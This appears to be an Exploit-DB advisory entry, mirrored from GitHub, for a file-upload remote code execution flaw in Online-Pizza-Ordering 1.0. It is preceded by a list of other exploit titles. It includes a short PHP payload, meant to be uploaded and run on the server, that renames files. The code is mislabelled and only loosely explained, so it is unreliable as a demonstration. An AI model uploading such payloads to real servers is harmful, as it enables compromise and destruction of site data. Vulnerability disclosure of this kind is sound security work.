85954a8fad
34 changes to exploits/shellcodes/ghdb ENTAB ERP 1.0 - Username PII leak ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS) ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS) FortiRecorder 6.4.3 - Denial of Service Schneider Electric v1.0 - Directory traversal & Broken Authentication Altenergy Power Control Software C1.2.5 - OS command injection Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE) Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated) Google Chrome 109.0.5414.74 - Code Execution via missing lib file (Ubuntu) Lucee Scheduled Job v1.0 - Command Execution Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE) Adobe Connect 11.4.5 - Local File Disclosure Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS) Suprema BioStar 2 v2.8.16 - SQL Injection Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS) dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated) GLPI v10.0.1 - Unauthenticated Sensitive Data Exposure Icinga Web 2.10 - Arbitrary File Disclosure Joomla! v4.2.8 - Unauthenticated information disclosure Medicine Tracker System v1.0 - Sql Injection Online Appointment System V1.0 - Cross-Site Scripting (XSS) Online-Pizza-Ordering -1.0 - Remote Code Execution (RCE) pfsenseCE v2.6.0 - Anti-brute force protection bypass Restaurant Management System 1.0 - SQL Injection WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS) X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated) X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated) Microsoft Windows 11 - 'cmd.exe' Denial of Service ActFax 10.10 - Unquoted Path Services ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path RSA NetWitness Platform 12.2 - Incorrect Access Control / Code Execution Stonesoft VPN Client 6.2.0 / 6.8.0 - Local Privilege Escalation
57 lines
No EOL
1.7 KiB
Text
57 lines
No EOL
1.7 KiB
Text
## Exploit Title: Online-Pizza-Ordering -1.0 - Remote Code Execution (RCE)
|
|
## Author: nu11secur1ty
|
|
## Date: 03.30.2023
|
|
## Vendor: https://github.com/oretnom23
|
|
## Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html
|
|
## Reference: https://portswigger.net/web-security/file-upload
|
|
|
|
## Description:
|
|
The malicious user can request an account from the administrator of
|
|
this system.
|
|
Then he can use this vulnerability to destroy or get access to all
|
|
accounts of this system, even more, worst than ever.
|
|
The malicious user can upload a very dangerous file on this server,
|
|
and he can execute it via shell,
|
|
this is because he can access the upload function from the
|
|
administrator account.
|
|
The status is CRITICAL.
|
|
|
|
STATUS: HIGH Vulnerability
|
|
|
|
[+]Exploit:
|
|
```mysql
|
|
<?php
|
|
// by nu11secur1ty - 2023
|
|
// Old Name Of The file
|
|
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;
|
|
|
|
// New Name For The File
|
|
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;
|
|
|
|
// using rename() function to rename the file
|
|
rename( $old_name, $new_name) ;
|
|
|
|
?>
|
|
|
|
```
|
|
|
|
## Reproduce:
|
|
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-Pizza-Ordering-1.0)
|
|
|
|
## Proof and Exploit:
|
|
[href](https://streamable.com/szb9qy)
|
|
|
|
## Time spend:
|
|
00:45:00
|
|
|
|
|
|
--
|
|
System Administrator - Infrastructure Engineer
|
|
Penetration Testing Engineer
|
|
Exploit developer at https://packetstormsecurity.com/
|
|
https://cve.mitre.org/index.html
|
|
https://cxsecurity.com/ and https://www.exploit-db.com/
|
|
0day Exploit DataBase https://0day.today/
|
|
home page: https://www.nu11secur1ty.com/
|
|
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
|
|
nu11secur1ty <http://nu11secur1ty.com/> |